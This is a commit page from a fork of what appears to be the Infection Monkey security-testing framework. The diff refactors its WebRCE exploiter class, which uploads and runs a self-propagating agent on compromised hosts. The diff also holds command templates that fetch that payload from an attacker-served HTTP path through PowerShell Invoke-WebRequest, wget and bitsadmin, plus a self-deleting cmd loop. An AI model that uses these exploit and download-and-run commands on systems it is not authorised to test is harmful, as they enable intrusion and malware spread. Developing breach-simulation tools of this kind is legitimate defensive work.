forked from p15670423/monkey
Final, tested framework fixes
This commit is contained in:
Vakaris
parent
5232d84e06
commit
0d45a44d6b
|
|
@ -107,7 +107,6 @@ class WebRCE(HostExploiter):
|
||||||
else:
|
else:
|
||||||
extensions = [""]
|
extensions = [""]
|
||||||
for port in ports:
|
for port in ports:
|
||||||
extensions = [(e[1:] if '/' == e[0] else e) for e in extensions]
|
|
||||||
for extension in extensions:
|
for extension in extensions:
|
||||||
if port[1]:
|
if port[1]:
|
||||||
protocol = "https"
|
protocol = "https"
|
||||||
|
|
@ -127,9 +126,12 @@ class WebRCE(HostExploiter):
|
||||||
resp = self.exploit(url, ARCH_LINUX)
|
resp = self.exploit(url, ARCH_LINUX)
|
||||||
if resp:
|
if resp:
|
||||||
# Pulls architecture string
|
# Pulls architecture string
|
||||||
# TODO TEST IF NOT FOUND
|
|
||||||
arch = re.search('(?<=Architecture:)\s+(\w+)', resp)
|
arch = re.search('(?<=Architecture:)\s+(\w+)', resp)
|
||||||
arch = arch.group(1)
|
try:
|
||||||
|
arch = arch.group(1)
|
||||||
|
except AttributeError:
|
||||||
|
LOG.error("Looked for linux architecture but could not find it")
|
||||||
|
return False
|
||||||
if arch:
|
if arch:
|
||||||
return arch
|
return arch
|
||||||
else:
|
else:
|
||||||
|
|
@ -167,7 +169,7 @@ class WebRCE(HostExploiter):
|
||||||
else:
|
else:
|
||||||
paths.extend([self._config.dropper_target_path_win_32, self._config.dropper_target_path_win_64])
|
paths.extend([self._config.dropper_target_path_win_32, self._config.dropper_target_path_win_64])
|
||||||
for path in paths:
|
for path in paths:
|
||||||
if self.check_remote_file(url, path):
|
if self.check_remote_monkey_file(url, path):
|
||||||
return True
|
return True
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
|
@ -179,15 +181,15 @@ class WebRCE(HostExploiter):
|
||||||
:param names: [] of service names. Example: ["http"]
|
:param names: [] of service names. Example: ["http"]
|
||||||
:return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [ port.nr, IsHTTPS?]
|
:return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [ port.nr, IsHTTPS?]
|
||||||
"""
|
"""
|
||||||
ports = WebRCE.get_open_service_ports(self.host, ports, names)
|
ports = self.get_open_service_ports(ports, names)
|
||||||
if not ports:
|
if not ports:
|
||||||
LOG.info("All default web ports are closed on %r, skipping", host)
|
LOG.info("All default web ports are closed on %r, skipping", host)
|
||||||
return False
|
return False
|
||||||
else:
|
else:
|
||||||
return ports
|
return ports
|
||||||
|
|
||||||
def set_host_arch(self, exploiter, url):
|
def set_host_arch(self, url):
|
||||||
arch = WebRCE.get_host_arch(exploiter, url)
|
arch = self.get_host_arch(url)
|
||||||
if not arch:
|
if not arch:
|
||||||
LOG.error("Couldn't get host machine's architecture")
|
LOG.error("Couldn't get host machine's architecture")
|
||||||
return False
|
return False
|
||||||
|
|
@ -203,7 +205,7 @@ class WebRCE(HostExploiter):
|
||||||
:return: {'response': response/False, 'path': monkeys_path_in_host}
|
:return: {'response': response/False, 'path': monkeys_path_in_host}
|
||||||
"""
|
"""
|
||||||
LOG.info("Trying to upload monkey to the host.")
|
LOG.info("Trying to upload monkey to the host.")
|
||||||
src_path = get_target_monkey(host)
|
src_path = get_target_monkey(self.host)
|
||||||
if not src_path:
|
if not src_path:
|
||||||
LOG.info("Can't find suitable monkey executable for host %r", host)
|
LOG.info("Can't find suitable monkey executable for host %r", host)
|
||||||
return False
|
return False
|
||||||
|
|
@ -213,7 +215,7 @@ class WebRCE(HostExploiter):
|
||||||
if not path:
|
if not path:
|
||||||
return False
|
return False
|
||||||
# Create server for http download and wait for it's startup.
|
# Create server for http download and wait for it's startup.
|
||||||
http_path, http_thread = HTTPTools.create_locked_transfer(host, src_path)
|
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
|
||||||
if not http_path:
|
if not http_path:
|
||||||
LOG.debug("Exploiter failed, http transfer creation failed.")
|
LOG.debug("Exploiter failed, http transfer creation failed.")
|
||||||
return False
|
return False
|
||||||
|
|
@ -223,10 +225,9 @@ class WebRCE(HostExploiter):
|
||||||
return False
|
return False
|
||||||
# Choose command:
|
# Choose command:
|
||||||
if commands:
|
if commands:
|
||||||
command = WebRCE.get_command(self.host, path, http_path, commands)
|
command = self.get_command(path, http_path, commands)
|
||||||
else:
|
else:
|
||||||
command = WebRCE.get_command(self.host, path, http_path,
|
command = self.get_command(path, http_path, {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
|
||||||
{'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
|
|
||||||
|
|
||||||
resp = self.exploit(url, command)
|
resp = self.exploit(url, command)
|
||||||
|
|
||||||
|
|
@ -283,10 +284,10 @@ class WebRCE(HostExploiter):
|
||||||
LOG.info("Trying to execute remote monkey")
|
LOG.info("Trying to execute remote monkey")
|
||||||
# Get monkey command line
|
# Get monkey command line
|
||||||
if dropper and path:
|
if dropper and path:
|
||||||
monkey_cmd = build_monkey_commandline(host, get_monkey_depth() - 1, path)
|
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, path)
|
||||||
command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd}
|
command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd}
|
||||||
else:
|
else:
|
||||||
monkey_cmd = build_monkey_commandline(host, get_monkey_depth() - 1)
|
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
||||||
command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': MONKEY_ARG, 'parameters': monkey_cmd}
|
command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': MONKEY_ARG, 'parameters': monkey_cmd}
|
||||||
try:
|
try:
|
||||||
resp = self.exploit(url, command)
|
resp = self.exploit(url, command)
|
||||||
|
|
@ -306,6 +307,3 @@ class WebRCE(HostExploiter):
|
||||||
return False
|
return False
|
||||||
LOG.info("Execution attempt finished")
|
LOG.info("Execution attempt finished")
|
||||||
return resp
|
return resp
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -17,8 +17,7 @@ RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObje
|
||||||
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
|
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
|
||||||
|
|
||||||
# Commands used for downloading monkeys
|
# Commands used for downloading monkeys
|
||||||
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%(http_path)s\\\' -OutFile \\\'%(monkey_path)s\\\' -UseBasicParsing\""
|
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
|
||||||
POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
|
|
||||||
WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
|
WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
|
||||||
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
||||||
CHMOD_MONKEY = "chmod +x %(monkey_path)s"
|
CHMOD_MONKEY = "chmod +x %(monkey_path)s"
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue